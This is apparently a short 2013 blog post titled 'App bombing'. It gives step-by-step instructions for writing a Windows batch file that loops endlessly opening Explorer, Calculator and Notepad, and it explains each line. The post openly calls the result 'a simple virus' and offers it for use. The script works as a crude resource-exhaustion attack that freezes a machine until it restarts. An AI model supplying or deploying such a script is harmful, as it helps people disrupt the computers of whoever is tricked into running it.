Tuesday 8 October 2013 | |

App bombing

Well sorry to say that this trick only works on windows computers.
So lets get started
Step 1) open notepad
Step 2)copy and paste the following text.

@echo off
:one
start explorer
start calculator
start notepad
goto one

Now just save this anywhere where you can run it easily.
 Save it as anything.bat name can be anything but at the end the.bat is necessary
Congrats. you just made a simple virus.
Let me explain.

Just ignore the @echo off
the :one is a place-marker  okay.now when i say start it starts any program.now i have written explorer and other things it will start those.in the the goto means goto a place marker.i set a Placemark called one so it will goto one.and in one it will again start all the applications again and this will repeat until your computer restarts or shut downs.

0 comments:

Post a Comment